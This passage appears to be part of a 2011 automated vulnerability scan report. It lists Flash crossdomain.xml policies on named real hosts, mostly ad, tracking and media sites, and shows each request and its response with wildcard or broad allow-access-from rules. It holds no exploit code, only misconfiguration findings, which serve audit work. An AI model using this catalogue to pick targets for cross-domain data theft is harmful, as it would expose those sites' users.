6.67. http://sync.adap.tv/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://sync.adap.tv
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: sync.adap.tv

Response

HTTP/1.0 200 OK
Content-Type: application/xml
Connection: close
Content-Length: 204

<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-polic
...[SNIP]...

6.68. http://sync.mathtag.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://sync.mathtag.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: sync.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/cross-domain-policy
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x3 pid 0xca8 3240
Set-Cookie: ts=1315099467; domain=.mathtag.com; path=/; expires=Mon, 03-Sep-2012 01:24:27 GMT
Connection: keep-alive
Content-Length: 215

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-
...[SNIP]...

6.69. http://sync.tidaltv.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://sync.tidaltv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: sync.tidaltv.com
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/xml
Date: Sun, 04 Sep 2011 01:11:58 GMT
ETag: "da861e55beecca1:17eb"
Last-Modified: Thu, 06 May 2010 01:49:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 78
Connection: keep-alive

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

6.70. http://tags.bluekai.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tags.bluekai.com

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 00:48:05 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 29 Jun 2011 21:44:06 GMT
ETag: "11003d9-ca-4a6e0af03f580"
Accept-Ranges: bytes
Content-Length: 202
Content-Type: text/xml
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" to-ports="*"/>
<site-control permitted-cross-domain-policies="all"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy
...[SNIP]...

6.71. http://tcr.tynt.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://tcr.tynt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tcr.tynt.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=1800
Content-Type: text/xml
Date: Sun, 04 Sep 2011 01:06:33 GMT
ETag: "251523935"
Expires: Sun, 04 Sep 2011 01:36:33 GMT
Last-Modified: Tue, 10 Nov 2009 16:25:33 GMT
Server: ECS (sjo/5227)
X-Cache: HIT
Content-Length: 201
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.72. http://traffic.outbrain.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://traffic.outbrain.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: traffic.outbrain.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"201-1311068652000"
Last-Modified: Tue, 19 Jul 2011 09:44:12 GMT
Content-Type: application/xml
Content-Length: 201
Date: Sun, 04 Sep 2011 01:24:37 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.73. http://trc.taboolasyndication.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://trc.taboolasyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: trc.taboolasyndication.com

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Sun, 04 Sep 2011 00:50:47 GMT
Content-Type: text/xml
Content-Length: 409
Last-Modified: Sun, 10 Jul 2011 17:16:59 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="*"/>
<allow-access-from domain="*" secure="false"/>
<allow-access-from domain="*" to-ports="80,443"/>
...[SNIP]...

6.74. http://usatoday1.112.2o7.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://usatoday1.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: usatoday1.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:42:19 GMT
Server: Omniture DC/2.0.0
xserver: www94
Content-Length: 137
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

6.75. http://vast.ap919.btrll.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://vast.ap919.btrll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: vast.ap919.btrll.com
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BR_MBBV=Ak5fqqZQd%2Fl1AQAWXfM; DRN1=AGPa-U7XtK4

Response

HTTP/1.1 200 OK
Connection: close
Content-Type: application/xml
Cache-Control: max-age=7776000
Date: Sun, 04 Sep 2011 01:12:49 GMT
Content-Length: 269

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.76. http://video.od.visiblemeasures.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.od.visiblemeasures.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: video.od.visiblemeasures.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?&width=300&height=500&flashID=myExperience&bgcolor=%23F4F4F4&wmode=opaque&dynamicStreaming=true&videoSmoothing=true&playerID=1055201224001&publisherID=315980433&isVid=true&autoStart=false&isUI=true&allowScriptAccess=always&debuggerID=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sun, 04 Sep 2011 01:17:21 GMT
Content-Type: text/xml
Content-Length: 169
Last-Modified: Tue, 01 Mar 2011 06:21:28 GMT
X-Cnection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<site-control permitted-cross-domain-policies="master-only"/>
</cross-domain-policy>

6.77. http://wac.3a03.edgecastcdn.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://wac.3a03.edgecastcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: wac.3a03.edgecastcdn.net

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/xml
Date: Sun, 04 Sep 2011 00:44:51 GMT
Last-Modified: Tue, 08 Mar 2011 05:43:30 GMT
Server: ECS (sjo/5227)
Content-Length: 203
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-domain-polic
...[SNIP]...

6.78. http://www.goutsa.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.goutsa.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.goutsa.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:26:15 GMT
Server: Apache
Last-Modified: Mon, 09 Mar 2009 13:39:57 GMT
ETag: "5e-464afc52da540"
Accept-Ranges: bytes
Content-Length: 94
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<cross-domain-policy>
   <allow-access-from domain="*" secure="false" />
</cross-domain-policy>

6.79. http://www.wunderground.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wunderground.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wunderground.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:28:36 GMT
Server: Apache/1.3.33 (Unix) PHP/4.4.0
Last-Modified: Thu, 05 May 2011 20:05:54 GMT
Accept-Ranges: bytes
Content-Length: 201
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.80. http://www.zvents.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.zvents.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.zvents.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 04 Sep 2011 01:00:47 GMT
Content-Type: text/xml
Content-Length: 201
Last-Modified: Thu, 26 May 2011 23:14:54 GMT
Connection: keep-alive
Expires: Mon, 05 Sep 2011 01:00:47 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.81. http://adadvisor.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adadvisor.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adadvisor.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:42:17 GMT
Connection: close
Server: AAWebServer
P3P: policyref="http://www.adadvisor.net/w3c/p3p.xml",CP="NOI NID"
Content-Length: 478
Content-Type: Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="
...[SNIP]...
<allow-access-from domain="*.tubemogul.com" />
...[SNIP]...
<allow-access-from domain="*.adap.tv" />
...[SNIP]...
<allow-access-from domain="*.videoegg.com" />
...[SNIP]...
<allow-access-from domain="*.tidaltv.com" />
...[SNIP]...

6.82. http://charlotteobserver.adperfect.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://charlotteobserver.adperfect.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: charlotteobserver.adperfect.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:19 GMT
Server: Apache
Last-Modified: Wed, 10 Aug 2011 00:38:56 GMT
Accept-Ranges: bytes
Content-Length: 343
MS-Author-Via: DAV
Connection: close
Content-Type: application/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy>    <site-control permitted-cross-domain-policies="all" />    <allow-access-from domain="*.adperfect.com" />
...[SNIP]...

6.83. http://cm.npc-mcclatchy.overture.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cm.npc-mcclatchy.overture.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cm.npc-mcclatchy.overture.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:20:48 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 03 May 2011 10:14:38 GMT
Accept-Ranges: bytes
Content-Length: 639
Connection: close
Content-Type: application/xml

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="stage.mce.media.yahoo.com" secure="false" />
...[SNIP]...
<allow-access-from domain="mce.media.yahoo.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.broadcast.com" />
<allow-access-from domain="*.launch.com" />
<allow-access-from domain="*.hotjobs.com" />
<allow-access-from domain="*.yimg.com" />
<allow-access-from domain="*.yahooligans.com" />
<allow-access-from domain="*.overture.com" />
...[SNIP]...

6.84. http://content.usatoday.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://content.usatoday.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: content.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 16 Mar 2011 20:16:44 GMT
Accept-Ranges: bytes
ETag: "c3bb41117e4cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 00:42:14 GMT
Connection: close
Content-Length: 1558

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.usatoday.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.usatoday.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="projects.usatoday.com"/>
   <allow-access-from domain="*.gannettonline.com"/>
   <allow-access-from domain="www.smashingideas.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="beta.tagware.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="nmp.newsgator.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="hostlogic.ca" secure="true"/>
...[SNIP]...
<allow-access-from domain="pages.samsung.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.com" />
   <allow-access-from domain="*.facebook.com" />
   <allow-access-from domain="demo.pointroll.net" />
   <allow-access-from domain="*.brightcove.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.metagrapher.com" />
...[SNIP]...

6.85. http://delivery.sprint.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://delivery.sprint.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: delivery.sprint.com

Response

HTTP/1.1 200 OK
Content-Length: 9520
Content-Type: text/xml
Last-Modified: Tue, 26 Apr 2011 22:25:29 GMT
Accept-Ranges: bytes
ETag: "c695d9604cc1:1de6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:22:23 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>

<!--Modified file on 1/5/2010 for security compl
...[SNIP]...
<allow-access-from domain="a676.g.akamaitech.net" />
<allow-access-from domain="staging.merchantmail.net" />
<allow-access-from domain="www.youcreatetheadventure.com" />
<allow-access-from domain="gap.p.delivery.net" />
<allow-access-from domain="*.akamaitech.net" />
<allow-access-from domain="*.garnier-rewards.com"/>
<allow-access-from domain="*.garnierrewards.com"/>
<allow-access-from domain="*.lexus.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn-ppe.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn-int.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn-int.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msads.net" secure="false" />
...[SNIP]...
<allow-access-from domain="comcast.beamland.com" />
<allow-access-from domain="webwalker06.comcastonline.com"/>
<allow-access-from domain="dynamic.abc.go.com"/>
<allow-access-from domain="ll.static.abc.com"/>
<allow-access-from domain="ll.media.abc.com"/>
<allow-access-from domain="*.abc.go.com"/>
<allow-access-from domain="*.abc.com"/>

<allow-access-from domain="www.sprintenterprise.com"/>
<allow-access-from domain="sprintenterprise.com"/>
<allow-access-from domain="*.eurorscg.com"/>


<allow-access-from domain="motifcdn.doubleclick.net" />
<allow-access-from domain="motifcdn2.doubleclick.net" />
<allow-access-from domain="m.doubleclick.net" />
<allow-access-from domain="m2.doubleclick.net" />
<allow-access-from domain="m3.doubleclick.net" />
<allow-access-from domain="m.2mdn.net" />
<allow-access-from domain="m2.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.dell.com" />
<allow-access-from domain="primediamags.com" />
<allow-access-from domain="sourceinterlinkpubs.com" />
<allow-access-from domain="wellsfargo.p.delivery.net" />
...[SNIP]...
<allow-access-from domain="betadfa.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="dfa.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="motifcdn2.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="ad.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m1.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="etrade.com" secure="true" />
...[SNIP]...
<allow-access-from domain="us.etrade.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.etrade.com" secure="true" />
...[SNIP]...
<allow-access-from domain="a248.e.akamai.net" secure="true" />
...[SNIP]...
<allow-access-from domain="pandora.luxus.fi" secure="true" />
...[SNIP]...
<allow-access-from domain="interactive.arn.com"/>
<allow-access-from domain="*.royalcaribbean.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.rccl.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.fedex.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.theweekmagazine.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.twmo.us" secure="false" />
...[SNIP]...
<allow-access-from domain="*.nokia.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.nokia.it" secure="false" />
...[SNIP]...
<allow-access-from domain="*.nokia.fi" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.fr" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.de" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.pt" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.ae" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.pl" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.hu" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.com.sa" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.at" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.ch" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.gr" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.es" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.ee" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.bg" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.nz" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.co.th" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.com.hr" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.si" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.cz" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.sk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.com.tr" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mea.nokia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.se" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.dk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.no" secure="false"/>
...[SNIP]...
<allow-access-from domain="view.atdmt.com" secure="false" />
...[SNIP]...
<allow-access-from domain="anon.screenplay.speedera.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.joyent.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.joyent.com" secure="false" />
...[SNIP]...
<allow-access-from domain="vmd-gap-app1" secure="false" />
...[SNIP]...
<allow-access-from domain="vmu-gap-app1" secure="false" />
...[SNIP]...
<allow-access-from domain="72.2.118.90" secure="false" />
...[SNIP]...
<allow-access-from domain="118.2.72.in-addr.arpa" secure="false" />
...[SNIP]...
<allow-access-from domain="vmu-gap-app1.sf.akqa.com" secure="false" />
...[SNIP]...
<allow-access-from domain="vmd-gap-app1.sf.akqa.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.gap.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="oldnavyweekly.com" secure="false" />
...[SNIP]...
<allow-access-from domain="stage.oldnavyweekly.com" secure="false" />
...[SNIP]...
<allow-access-from domain="dev.oldnavyweekly.com" secure="false" />
...[SNIP]...
<allow-access-from domain="oldnavyweekly.cpbinteractive.com" secure="false" />
...[SNIP]...
<allow-access-from domain="on.cpbstaging.com" secure="false" />
...[SNIP]...
<allow-access-from domain="oldnavyweekly.com.evohst.org" secure="false"/>
...[SNIP]...
<allow-access-from domain="stage.oldnavyweekly.com.evohst.org" secure="false"/>
...[SNIP]...
<allow-access-from domain="dev.oldnavyweekly.com.evohst.org" secure="false"/>
...[SNIP]...
<allow-access-from domain="onweeklydev.cpbstaging.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.samsclub.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="samsclub.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.rockfishinteractive.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.oldnavyweekly.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cpbstaging.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.intava.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.lstudio.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.digitas.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="comcast.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.comcast.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.sprint.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cheerfactory.com" secure="false" />
...[SNIP]...
<allow-access-from domain="app1.gap.preloading.co.uk" secure="false" />
...[SNIP]...
<allow-access-from domain="app2.gap.preloading.co.uk" secure="false" />
...[SNIP]...
<allow-access-from domain="*.asimpletheory.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.unicast.com" secure="false" />
...[SNIP]...
<allow-access-from domain="208.82.64.0" secure="true" />
...[SNIP]...
<allow-access-from domain="208.82.64.22" secure="true" />
...[SNIP]...
<allow-access-from domain="208.82.66.10" secure="true" />
...[SNIP]...
<allow-access-from domain="208.82.66.11" secure="true" />
...[SNIP]...
<allow-access-from domain="208.82.66.12" secure="true" />
...[SNIP]...
<allow-access-from domain="208.82.66.13" secure="true" />
...[SNIP]...
